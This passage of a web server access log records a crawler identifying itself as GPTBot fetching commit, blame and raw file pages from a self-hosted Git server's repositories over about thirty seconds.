"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:14:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16919] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" -[17/Feb/2026:14:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11516] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:14:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/swagger.js?v=1.25.3" [Client 74.7.227.38] [Length 419897] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/api/swagger" -[17/Feb/2026:14:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode" [Client 74.7.227.38] [Length 9914] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode" -[17/Feb/2026:14:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14269] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2frequirements.txt" [Client 74.7.227.38] [Length 24176] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" -[17/Feb/2026:14:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json" -[17/Feb/2026:14:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/status.json" -[17/Feb/2026:14:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/status.json" -[17/Feb/2026:14:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71995] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" -[17/Feb/2026:14:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" [Client 74.7.227.38] [Length 9994] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/status.json" -[17/Feb/2026:14:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fControlRoom7.png" [Client 74.7.227.38] [Length 19850] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/ControlRoom7.png" -[17/Feb/2026:14:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2fassets%2fjs" [Client 74.7.227.38] [Length 19250] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js" -[17/Feb/2026:14:50:15 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/assets/js/'+mi(t[e].href)+'" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/assets/js/swagger.js?v=1.25.3" -[17/Feb/2026:14:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" [Client 74.7.227.38] [Length 9913] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app" -[17/Feb/2026:14:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14281] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:14:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app" [Client 74.7.227.38] [Length 9883] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app" -[17/Feb/2026:14:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10463] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" -[17/Feb/2026:14:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 138208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10464] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" -[17/Feb/2026:14:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10463] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" -[17/Feb/2026:14:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10440] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" -[17/Feb/2026:14:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/About.tsx" -[17/Feb/2026:14:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9880] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets%2fimages%2finstrument.png" [Client 74.7.227.38] [Length 19814] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/instrument.png" -[17/Feb/2026:14:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" [Client 74.7.227.38] [Length 10635] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:14:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/mail_contact.py" [Client 74.7.227.38] [Length 16303] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage" -[17/Feb/2026:14:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72020] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:14:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 11305] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj" -[17/Feb/2026:14:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9885] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" -[17/Feb/2026:14:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" -[17/Feb/2026:14:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11598] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.tsx" -[17/Feb/2026:14:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx" -[17/Feb/2026:14:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" [Client 74.7.227.38] [Length 10402] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" -[17/Feb/2026:14:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/.vscode" -[17/Feb/2026:14:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:14:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23928] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project" -[17/Feb/2026:14:50:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/mail_contact.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" -[17/Feb/2026:14:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/mail_contact.py" -[17/Feb/2026:14:50:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:14:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] 